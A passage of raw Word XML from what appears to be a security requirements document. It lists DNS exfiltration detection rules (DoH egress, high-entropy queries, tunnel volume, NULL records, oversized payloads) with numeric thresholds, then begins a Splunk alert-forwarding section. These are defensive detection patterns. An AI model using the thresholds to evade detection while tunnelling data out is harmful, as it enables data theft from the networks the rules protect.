            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="621BB19E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="49684BB8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D1A8AF5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2E51CB32" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DoH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> egress detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="12ED101D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTPS to known </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DoH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> providers (compensating control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B8FDEEF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="415A3A90" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="412DA3F7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0EF81792" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Source-correlated multi-domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5EACF189" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Same source, entropy labels, &gt;2 novel domains in 1h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2BBB0922" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="4CB0CC28" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3D857EA7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E12a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4558AC6D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS tunnel — sustained session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="75DBB0AE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Continuous entropy queries &gt;5min, same domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0815F04F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="7D261635" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="359502FB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E12b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="30A038F7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Large response anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0DB63725" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Avg response &gt;200 bytes to same domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="226E50FF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0B001FF9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="392EEBB6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E12c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="581573B7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bidirectional data flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4A052213" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>High entropy in both queries and responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="41F910A3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="7E6CAED4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1ED7565F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E13a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="461935DB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS tunnel — volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5033E701" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt;100 queries/min sustained &gt;2min, same domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7231E009" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6AAA90E1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A7BFB12" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E13b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="715BA559" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>NULL record type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="63E32FEE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Any NULL record query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1DB2AD2E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="07DE8BDF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2C84F968" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E13c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0460D351" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Oversized DNS payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="11977750" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Query or response &gt;512 bytes to external domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7AC8E3F8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FA89757" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2E0B1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9. Splunk Integration Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3291FC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B17466B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>9.1 Alert Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F5477F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Every detection rule that fires must generate a structured alert forwarded to Splunk. The vendor must configure syslog, CEF, or LEEF forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC497B1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FC6938" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Required Fields per Alert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B2212" w14:paraId="358A176D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="085D765E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="0492B2A5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="0ADC03CA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0961BDA8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0DB18F89" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6FDC3390" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Time of detection (ISO 8601)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6DB30F60" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>2026-09-16T10:23:45.000Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="65502EEF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="05B5792D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>src_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1DF66E18" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Source IP of the querying host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="11EA51C8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
